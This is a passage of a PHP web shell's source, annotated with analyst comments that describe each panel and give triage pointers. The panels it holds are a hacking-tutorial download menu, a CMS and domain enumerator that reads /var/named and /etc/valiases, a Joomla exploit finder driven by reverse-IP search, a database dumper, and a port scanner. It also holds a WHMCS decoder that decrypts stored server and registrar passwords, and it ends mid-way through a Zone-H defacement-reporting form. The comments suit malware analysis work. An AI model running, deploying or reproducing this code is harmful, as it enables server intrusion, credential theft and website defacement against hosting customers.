2232 <option value="security_polices">Creating Security Polices</option>
2233 </select>
2234 <input type="submit" name="submit" class="inputzbut" value="Download">
2235</form></td>
2236<td>
2237<form method="post" action="">
2238X-CODE MAGAZINE :
2239 <select class="inputzbut" name="pilih" id="pilih">
2240 <option value=""selected>-----------------[ Select ]-----------------</option>
2241 <option value="tutorial4">X-CODE MAGAZINE 1</option>
2242 <option value="tutorial5">X-CODE MAGAZINE 2</option>
2243 <option value="tutorial6">X-CODE MAGAZINE 3</option>
2244 <option value="tutorial7">X-CODE MAGAZINE 4</option>
2245 <option value="tutorial8">X-CODE MAGAZINE 5</option>
2246 <option value="tutorial9">X-CODE MAGAZINE 6</option>
2247 <option value="tutorial10">X-CODE MAGAZINE 7</option>
2248 <option value="tutorial11">X-CODE MAGAZINE 8</option>
2249 <option value="tutorial12">X-CODE MAGAZINE 9</option>
2250 <option value="tutorial13">X-CODE MAGAZINE 10</option>
2251 <option value="tutorial14">X-CODE MAGAZINE 11</option>
2252 <option value="tutorial15">X-CODE MAGAZINE 12</option>
2253 <option value="tutorial16">X-CODE MAGAZINE 13</option>
2254 <option value="tutorial17">X-CODE MAGAZINE 14</option>
2255 <option value="tutorial18">X-CODE MAGAZINE 15</option>
2256 <option value="tutorial19">X-CODE MAGAZINE 16</option>
2257 <option value="tutorial20">X-CODE MAGAZINE 17</option>
2258 <option value="tutorial21">X-CODE MAGAZINE 18</option>
2259 <option value="tutorial22">X-CODE MAGAZINE 19</option>
2260 <option value="tutorial23">X-CODE MAGAZINE 20</option>
2261 <option value="tutorial024">X-CODE MAGAZINE 21</option>
2262 </select>
2263 <input type="submit" name="submit" class="inputzbut" value="Download" ></a>
2264</form></td></tr></table><br><br>
2265<?php
/*
 * Analyst note ("tutor" panel handler). $_POST['submit'] is copied before any
 * isset() check, then $_POST['pilih'] is compared against a fixed list of
 * values. Each match emits a <script> block that sets document.location to a
 * hard-coded third-party URL; nothing is fetched or stored server-side here.
 * The if/elseif chain opened on this line continues on the following lines.
 * The hard-coded hosts in that chain can be used as indicators when triaging
 * this sample.
 */
$submit = $_POST ['submit']; if(isset($submit)) { $pilih = $_POST['pilih']; if ( $pilih == 'tutorial1') { ?>
2266 <script>
2267 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf';
2268 </script>
2269 <?php } elseif ( $pilih == 'tutorial2') { ?>
2270 <script>
2271 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf';
2272 </script>
2273 <?php } elseif ( $pilih == 'tutorial3') { ?>
2274 <script>
2275 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf';
2276 </script>
2277 <?php } elseif ( $pilih == 'tutorial4') { ?>
2278 <script>
2279 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_1.zip';
2280 </script>
2281 <?php } elseif ( $pilih == 'tutorial5') { ?>
2282 <script>
2283 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_2.zip';
2284 </script>
2285 <?php } elseif ( $pilih == 'tutorial6') { ?>
2286 <script>
2287 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_3.zip';
2288 </script>
2289 <?php } elseif ( $pilih == 'tutorial7') { ?>
2290 <script>
2291 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_4.zip';
2292 </script>
2293 <?php } elseif ( $pilih == 'tutorial8') { ?>
2294 <script>
2295 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_5.rar';
2296 </script>
2297 <?php } elseif ( $pilih == 'tutorial9') { ?>
2298 <script>
2299 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_6.rar';
2300 </script>
2301 <?php } elseif ( $pilih == 'tutorial10') { ?>
2302 <script>
2303 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_7.rar';
2304 </script>
2305 <?php } elseif ( $pilih == 'tutorial11') { ?>
2306 <script>
2307 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_8.rar';
2308 </script>
2309 <?php } elseif ( $pilih == 'tutorial12') { ?>
2310 <script>
2311 document.location = 'hxxp://xcode.or.id/files/xcode9.zip';
2312 </script>
2313 <?php } elseif ( $pilih == 'tutorial13') { ?>
2314 <script>
2315 document.location = 'hxxp://xcode.or.id/files/xcode10.zip';
2316 </script>
2317 <?php } elseif ( $pilih == 'tutorial14') { ?>
2318 <script>
2319 document.location = 'hxxp://xcode.or.id/files/xcode11.zip';
2320 </script>
2321 <?php } elseif ( $pilih == 'tutorial15') { ?>
2322 <script>
2323 document.location = 'hxxp://xcode.or.id/files/Xcode12.zip';
2324 </script>
2325 <?php } elseif ( $pilih == 'tutorial16') { ?>
2326 <script>
2327 document.location = 'hxxp://xcode.or.id/files/Xcode13.zip';
2328 </script>
2329 <?php } elseif ( $pilih == 'tutorial17') { ?>
2330 <script>
2331 document.location = 'hxxp://xcode.or.id/files/Xcode14.zip';
2332 </script>
2333 <?php } elseif ( $pilih == 'tutorial18') { ?>
2334 <script>
2335 document.location = 'hxxp://xcode.or.id/Xcode15.zip';
2336 </script>
2337 <?php } elseif ( $pilih == 'tutorial19') { ?>
2338 <script>
2339 document.location = 'hxxp://xcode.or.id/xcode_magazine_16.zip';
2340 </script>
2341 <?php } elseif ( $pilih == 'tutorial20') { ?>
2342 <script>
2343 document.location = 'hxxp://xcode.or.id/xcode_magazine_17.zip';
2344 </script>
2345 <?php } elseif ( $pilih == 'tutorial21') { ?>
2346 <script>
2347 document.location = 'hxxp://xcode.or.id/xcode_magazine_18.zip';
2348 </script>
2349 <?php } elseif ( $pilih == 'tutorial22') { ?>
2350 <script>
2351 document.location = 'hxxp://xcode.or.id/xcode_magazine_19.zip';
2352 </script>
2353 <?php } elseif ( $pilih == 'tutorial23') { ?>
2354 <script>
2355 document.location = 'hxxp://xcode.or.id/xcode_magazine_20.zip';
2356 </script>
2357 <?php } elseif ( $pilih == 'tutorial024') { ?>
2358 <script>
2359 document.location = 'hxxp://xcode.or.id/xcode_magazine_21.zip';
2360 </script>
2361 <?php } elseif ( $pilih == 'tutorial24') { ?>
2362 <script>
2363 document.location = 'hxxp://www.insecure.in/ebooks/hacking_exposed_5.rar';
2364 </script>
2365 <?php } elseif ( $pilih == 'tutorial25') { ?>
2366 <script>
2367 document.location = 'hxxp://www.insecure.in/ebooks/internet_denial_of_service.rar';
2368 </script>
2369 <?php } elseif ( $pilih == 'tutorial26') { ?>
2370 <script>
2371 document.location = 'hxxp://www.insecure.in/ebooks/computer_viruses_for_dummies.rar';
2372 </script>
2373 <?php } elseif ( $pilih == 'tutorial27') { ?>
2374 <script>
2375 document.location = 'hxxp://www.insecure.in/ebooks/hack_attacks_testing.rar';
2376 </script>
2377 <?php } elseif ( $pilih == 'tutorial28') { ?>
2378 <script>
2379 document.location = 'hxxp://www.insecure.in/ebooks/secrets_of_super_hacker.rar';
2380 </script>
2381 <?php } elseif ( $pilih == 'tutorial29') { ?>
2382 <script>
2383 document.location = 'hxxp://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar';
2384 </script>
2385 <?php } elseif ( $pilih == 'tutorial30') { ?>
2386 <script>
2387 document.location = 'hxxp://www.insecure.in/ebooks/webapp_hackers_handbook.rar';
2388 </script>
2389 <?php } elseif ( $pilih == 'ddd') { ?>
2390 <script>
2391 document.location = 'hxxp://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf';
2392 </script>
2393 <?php } elseif ( $pilih == 'tutorial31') { ?>
2394 <script>
2395 document.location = 'hxxp://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf';
2396 </script>
2397 <?php } elseif ( $pilih == 'cryptography_for_defeloper') { ?>
2398 <script>
2399 document.location = 'hxxp://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf';
2400 </script>
2401 <?php } elseif ( $pilih == 'forensic') { ?>
2402 <script>
2403 document.location = 'hxxp://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf';
2404 </script>
2405 <?php } elseif ( $pilih == 'metasploit') { ?>
2406 <script>
2407 document.location = 'hxxp://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf';
2408 </script>
2409 <?php }elseif ( $pilih == 'stealing_network') { ?>
2410 <script>
2411 document.location = 'hxxp://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf';
2412 </script>
2413 <?php }elseif ( $pilih == 'security_polices') { ?>
2414 <script>
2415 document.location = 'hxxp://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf';
2416 </script>
2417 <?php } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'cms_detect')) { ?>
2418 <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">
2419 <br><br><br><br><center><b><font size=4>--=[ CMS Detector ]=--</font></b></center><br><br>
2420 <?php
/*
 * Analyst note ("cms_detect" panel). If pee.tmp does not exist in the current
 * directory it is created with fopen(..., 'w') (errors suppressed, handle
 * discarded). Then, if /var/named is readable, every entry whose name contains
 * ".db" past the first character is treated as a domain: the owner of
 * /etc/valiases/<domain> is resolved with posix_getpwuid(fileowner(...)) and
 * the domain/owner pair is passed to cms_add() once per CMS name. cms_add()
 * and $pageURL are defined outside this excerpt. $p, $current_dir and $dir
 * are assigned but not used in the visible code.
 * When pee.tmp already exists, the branch only echoes whatever
 * file_get_contents($pageURL.'pee.tmp') returns, unescaped.
 * Triage pointers visible in the code: a pee.tmp file and a pee/ path next to
 * the script, and reads of /var/named and /etc/valiases by the web-server
 * user. The trailing elseif opens the next panel ("jss").
 */
if(!file_exists('pee.tmp')){ @fopen('pee.tmp', 'w'); echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>'; $p = 0; if(is_readable("/var/named")){ $list = scandir("/var/named"); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); error_reporting(0); $link = $pageURL.'pee/'.$owner['name']; cms_add($link,$domain,$owner['name'],"WordPress"); cms_add($link,$domain,$owner['name'],"Joomla"); cms_add($link,$domain,$owner['name'],"vBulletin"); cms_add($link,$domain,$owner['name'],"WHMCS"); cms_add($link,$domain,$owner['name'],"PhpBB"); cms_add($link,$domain,$owner['name'],"MyBB"); cms_add($link,$domain,$owner['name'],"IPB"); cms_add($link,$domain,$owner['name'],"SMF"); cms_add($link,$domain,$owner['name'],"Drupal"); cms_add($link,$domain,$owner['name'],"e107"); cms_add($link,$domain,$owner['name'],"Seditio"); cms_add($link,$domain,$owner['name'],"osCommerce"); } } } }else{ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>'; $content = file_get_contents($pageURL.'pee.tmp'); echo $content; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'jss')) { ?>
2421 <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">
2422 <?php
/*
 * Analyst note ("jss" panel). Prints a form asking for an IP, then defines
 * three helpers and a driver further down in this same PHP block. All URLs in
 * this paste use an "hxxp" scheme, which looks like defanging applied to the
 * paste rather than original code - confirm against a raw sample.
 */
echo '
2423
2424<br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>
2425<form method="POST">
2426 <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>
2427</form><center>
2428
2429'; @set_time_limit(0); @error_reporting(E_ALL | E_NOTICE);
/*
 * check_exploit($comxx): interpolates $comxx, without URL-encoding, into a
 * search URL on exploit-db.com, fetches it with file_get_contents (errors
 * suppressed) and echoes a "Not Found" or "Found" table cell depending on
 * whether the response matches "No results". $comxx and $link are echoed into
 * HTML unescaped. eregi() was removed in PHP 7.0, so this helper only runs on
 * older runtimes.
 */
function check_exploit($comxx){ $link ="hxxp://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="; $result = @file_get_contents($link); if (eregi("No results",$result)) { echo"<td>Not Found</td><td><a href='hxxp://www.google.com/#hl=en&q=download+$comxx+joomla+extension'>Download</a></td></tr>"; }else{ echo"<td><a href='$link'>Found</a></td><td><=</td></tr>"; } }
/*
 * check_com($url): fetches $url, extracts the strings following "option,",
 * "option=" and "/components/" with three regexes, de-duplicates them, and for
 * each one echoes a table row and calls check_exploit(). The extracted values
 * come from remote page content and are echoed unescaped.
 */
function check_com($url){ $source = @file_get_contents($url); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo "<tr><td>$comm</td>"; check_exploit($comm); } }
/*
 * sec($site): keeps the part of $site up to "/index.php", strips "index.php",
 * and adds a "www." host prefix when the match does not already contain "www".
 * Returns the resulting URL string.
 */
function sec($site){ preg_match_all('{hxxp://(.*?)(/index.php)}siU',$site, $sites); if(eregi("www",$sites[0][0])){ return $site=str_replace("index.php","",$sites[0][0]); }else{ return $site=str_replace("hxxp://","hxxp://www.",str_replace("index.php","",$sites[0][0])); }}
/*
 * Driver: on any POST, $_POST['site'] (trim + strip_tags only) is placed in a
 * bing.com "ip:" search that is paged in steps of 10 up to $npages; result
 * links are normalised with sec(), counted, and each unique site is passed to
 * check_com(). set_time_limit(0) above removes the execution time limit.
 * Detection view: the web-server process issues bursts of outbound HTTP
 * requests to bing.com, exploit-db.com and to every site found, which is
 * unusual for a PHP worker and visible in egress or proxy logs.
 */
$npages = 50000; if ($_POST) { $ip = trim(strip_tags($_POST['site'])); $npage = 1; $allLinks = array(); while($npage <= $npages) { $x=@file_get_contents('hxxp://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage); if ($x) { preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU', $x, $findlink); foreach ($findlink[1] as $fl) $allLinks[]=sec($fl); $npage = $npage + 10; if (preg_match('(first=' . $npage . '&)siU', $x, $linksuiv) == 0) break; } else break; } $allDmns = array(); foreach ($allLinks as $kk => $vv){ $allDmns[] = $vv; } echo'<table border="1" width=\"80%\" align=\"center\">
2430<tr><td width=\"30%\"><b>Server IP : </b></td><td><b>'.$ip.'</b></td></tr>
2431<tr><td width=\"30%\"><b>Sites Found : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
2432</table>'; echo "<br><br>"; echo'<table border="1" width="80%" align=\"center\">'; foreach(array_unique($allDmns) as $h3h3){ echo'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>'; check_com($h3h3); } echo"</table>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'dump')) { ?>
2433 <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">
2434 <?php
/*
 * Analyst note ("dump" panel). Renders a form for database host, user,
 * password, database name and output format; $head and $me are defined
 * outside this excerpt. The processing code follows the form markup.
 */
echo $head.'<p align="center">'; echo '
2435<table width=371 class=tabnet >
2436<tr><th colspan="2">Database Dump</th></tr>
2437<tr>
2438 <td>Server </td>
2439 <td><input class="inputz" type=text name=server size=52></td></tr><tr>
2440 <td>Username</td>
2441 <td><input class="inputz" type=text name=username size=52></td></tr><tr>
2442 <td>Password</td>
2443 <td><input class="inputz" type=text name=password size=52></td></tr><tr>
2444 <td>DataBase Name</td>
2445 <td><input class="inputz" type=text name=dbname size=52></td></tr>
2446 <tr>
2447 <td>DB Type </td>
2448 <td><form method=post action="'.$me.'">
2449 <select class="inputz" name=method>
2450 <option value="gzip">Gzip</option>
2451 <option value="sql">Sql</option>
2452 </select>
2453 <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
2454 </form></center></table>';
/*
 * Processing: when username, dbname and method are posted, the code connects
 * with the operator-supplied credentials, walks SHOW TABLES, and writes each
 * table's CREATE statement and rows (as INSERT statements) through write()
 * into a file named Dump-<dbname>-<YYYY-MM-DD>.sql or .sql.gz in the current
 * directory, then streams that file back as an attachment. $dbname comes
 * straight from $_POST and is used unvalidated in both the file name and the
 * SQL text. No unlink() is visible, so the dump file stays on disk after the
 * download. The header() calls come after the form has been echoed; whether
 * they take effect depends on output buffering, which this excerpt does not
 * show. The mysql_* functions used here were removed in PHP 7.0.
 * Triage pointers: Dump-*.sql / Dump-*.sql.gz files under the web root, and
 * full-table SELECTs issued by the web application's database account. If
 * such files exist, treat the database contents as exposed.
 */
if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='ssql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='ssql'){ fclose ($fp); }else{ gzclose($fp);} header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } } elseif(isset($_GET['x']) && ($_GET['x'] == 'port-sc')) { ?>
2455 <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">
2456 <?php
/*
 * Analyst note ("port-sc" panel). host, start and end are taken from $_POST
 * with strip_tags() only. When host is set and both bounds are numeric, the
 * loop calls fsockopen($host, $i, ..., 3) for every port in the range (3 s
 * timeout each, errors suppressed) and prints the ports that accepted a
 * connection; otherwise the input form is shown. There is no restriction on
 * the target host or the size of the range, and sockets are not closed
 * explicitly.
 * Detection view: a PHP worker opening sequential outbound or loopback TCP
 * connections across many ports on one host. Egress filtering for the
 * web-server account limits what this can reach.
 */
echo '<br><br><center><br><b>--==[ Port Scanner ]==--</b><br>'; $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){ for($i = $start; $i<=$end; $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3); if($fp){ echo 'Port '.$i.' is <font color=green>open</font><br>'; } flush(); } }else{ echo '<table class=tabnet style="width:300px;padding:0 1px;">
2457 <input type="hidden" name="y" value="phptools">
2458 <tr><th colspan="5">Port Scanner</th></center></tr>
2459 <tr>
2460 <td>Host</td>
2461 <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="host" value="localhost"/></td>
2462 </tr>
2463 <tr>
2464 <td>Port start</td>
2465 <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="start" value="0"/></td>
2466 </tr>
2467 <tr><td>Port end</td>
2468 <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="end" value="5000"/></td>
2469 </tr><td><input class="inputzbut" type="submit" style="color:#FF0000" value="Scan Ports" />
2470 </td></form></center></table>'; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'hash')) {
/*
 * Analyst note ("hash" panel). Computes MD5, MD4, SHA-1 and salted/nested
 * variants of $_POST['password'] with a hard-coded $salt and prints them in a
 * table. Purely local computation; no network or file access in this branch.
 * NOTE(review): the SHA-256 row hashes $text, which is never assigned in this
 * excerpt, so it does not reflect the submitted value.
 * The submitted value and the results are echoed into unquoted value=
 * attributes without escaping. The trailing elseif opens the "whmcs" panel.
 */
$submit= $_POST['enter']; if (isset($submit)) { $pass = $_POST['password']; $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; $hash = md5($pass); $md4 = hash("md4",$pass); $hash_md5 = md5($salt.$pass); $hash_md5_double = md5(sha1($salt.$pass)); $hash1 = sha1($pass); $sha256 = hash("sha256",$text); $hash1_sha1 = sha1($salt.$pass); $hash1_sha1_double = sha1(md5($salt.$pass)); } echo '<form action="" method="post"><b><table class=tabnet>'; echo '<tr><th colspan="2">Password Hash</th></center></tr>'; echo '<tr><td><b>Enter the word you want to encrypt:</b></td>'; echo '<td><input class="inputz" type="text" name="password" size="40" />'; echo '<input class="inputzbut" type="submit" name="enter" value="hash" />'; echo '</td></tr><br>'; echo '<tr><th colspan="2">Hash Result</th></center></tr>'; echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>'; echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>'; echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>'; echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>'; echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>'; echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>'; echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>'; echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>'; echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs')) { ?>
2471<form action="?y=<?php echo $pwd; ?>&x=whmcs" method="post">
2472
2473<?php
/*
 * decrypt($string, $cc_encryption_hash): base64-decodes $string, treats its
 * first strlen(_hash(...)) bytes as an IV, and XORs the remainder against a
 * keystream derived from $cc_encryption_hash through md5() and _hash().
 * Returns the decoded bytes as a string. No authentication or integrity
 * check is performed on the input.
 */
function decrypt ($string,$cc_encryption_hash) { $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash); $hash_key = _hash ($key); $hash_length = strlen ($hash_key); $string = base64_decode ($string); $tmp_iv = substr ($string, 0, $hash_length); $string = substr ($string, $hash_length, strlen ($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen ($string)) { if (($c != 0 AND $c % $hash_length == 0)) { $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length)); } $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c])); ++$c; } return $out; }
/*
 * _hash($string): returns the SHA-1 digest of $string (MD5 if sha1() is not
 * available) converted from hex to raw bytes, two hex characters per byte.
 */
function _hash ($string) { if (function_exists ('sha1')) { $hash = sha1 ($string); } else { $hash = md5 ($string); } $out = ''; $c = 0; while ($c < strlen ($hash)) { $out .= chr (hexdec ($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } echo "
2474<br><center><font size='5' color='#FF0000'><b>--==[ WHMCS Decoder ]==--</b></font></center>
2475<center>
2476<br>
2477
2478<FORM action='' method='post'>
2479<input type='hidden' name='form_action' value='2'>
2480<br>
2481<table class=tabnet style=width:320px;padding:0 1px;>
2482<tr><th colspan=2>WHMCS Decoder</th></tr>
2483<tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
2484<tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
2485<tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
2486<tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
2487<tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
2488<td> <INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:' value='Submit' name='Submit'></td>
2489</table>
2490</FORM>
2491</center>
2492";
/*
 * Analyst note ("whmcs" panel driver). With form_action == 2 the code
 * connects to MySQL using the posted credentials, reads every row of
 * tblservers and tblregistrars, and prints the fields with the password and
 * value columns passed through decrypt() using the posted cc_encryption_hash
 * (presumably the value from the billing application's configuration file -
 * confirm). All output is echoed unescaped. The mysql_* functions used here
 * were removed in PHP 7.0.
 * Response view: if this panel was reachable on a host that also holds the
 * database credentials and the encryption hash, every server and registrar
 * credential stored in those tables should be treated as disclosed and
 * rotated, together with the hash itself.
 * The trailing elseif opens the "zone" panel.
 */
if($_POST['form_action'] == 2 ) { $db_host=($_POST['db_host']); $db_username=($_POST['db_username']); $db_password=($_POST['db_password']); $db_name=($_POST['db_name']); $cc_encryption_hash=($_POST['cc_encryption_hash']); $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("SELECT * FROM tblservers"); while($v = mysql_fetch_array($query)) { $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; echo("<center><table border='1'>"); $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>Type</td><td>$type</td></tr>"); echo("<tr><td>Active</td><td>$active</td></tr>"); echo("<tr><td>Hostname</td><td>$hostname</td></tr>"); echo("<tr><td>Ip</td><td>$ipaddress</td></tr>"); echo("<tr><td>Username</td><td>$username</td></tr>"); echo("<tr><td>Password</td><td>$password</td></tr>"); echo "</table><br><br></center>"; } $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("SELECT * FROM tblregistrars"); echo("<center>Domain Reseller <br><table class=tabnet border='1'>"); echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>"); while($v = mysql_fetch_array($query)) { $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt ($v['value'], $cc_encryption_hash); if ($value=="") { $value=0; } $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>"); } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'zone')) { ?>
2493<form action="?y=<?php echo $pwd; ?>&x=zone" method="post">
2494
2495<br><br><center>
2496<!-- Zone-H -->
2497<form action="" method='POST'><table><table class='tabnet'><tr>
2498<td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><h2>Zone-H</h2></th></tr></td></tr><tr><td height='45' colspan='2'><form method="post">
2499<input type="text" class="inputz" name="defacer" value="Nama Defacer" />
2500<select name="hackmode" class="inputz" >
2501<option >------------------------Choose Any------------------------</option>
2502<option value="1">Known Vulnerability (i.e. unpatched system)</option>
2503<option value="2" >Undisclosed (new) vulnerability</option>
2504<option value="3" >Configuration / Admin. Mistake</option>
2505<option value="4" >Brute Force Attack</option>
2506<option value="5" >Social Engineering</option>
2507<option value="6" >Web Server Intrusion</option>
2508<option value="7" >Web Server External Module Intrusion</option>
2509<option value="8" >Mail Server Intrusion</option>
2510<option value="9" >FTP Server Intrusion</option>
2511<option value="10" >SSH Server Intrusion</option>
2512<option value="11" >Telnet Server Intrusion</option>
2513<option value="12" >RPC Server Intrusion</option>
2514<option value="13" >Shares Misconfiguration</option>
2515<option value="14" >Other Server Intrusion</option>
2516<option value="15" >SQL Injection</option>
2517<option value="16" >URL Poisoning</option>
2518<option value="17" >File Inclusion</option>
2519<option value="18" >Other Web Application Bug</option>
2520<option value="19" >Remote Administrative Panel Access Bruteforcing</option>
2521<option value="20" >Remote Administrative Panel Access Password Guessing</option>
2522<option value="21" >Remote Administrative Panel Access Social Engineering</option>
2523<option value="22" >Attack Against Administrator(password stealing/sniffing)</option>
2524<option value="23" >Access Credentials Through Man In the Middle Attack</option>
2525<option value="24" >Remote Service Password Guessing</option>
2526<option value="25" >Remote Service Password Bruteforce</option>
2527<option value="26" >Rerouting After Attacking The Firewall</option>
2528<option value="27" >Rerouting After Attacking The Router</option>
2529<option value="28" >DNS Attack Through Social Engineering</option>
2530<option value="29" >DNS Attack Through Cache Poisoning</option>
2531<option value="30" >Not Available</option>
2532</select>
2533
2534<select name="reason" class="inputz" >
2535<option >-------------Choose Any---------------</option>
2536<option value="1" >Heh...just for fun!</option>
2537<option value="2" >Revenge against that website</option>
2538<option value="3" >Political reasons</option>
2539<option value="4" >As a challenge</option>
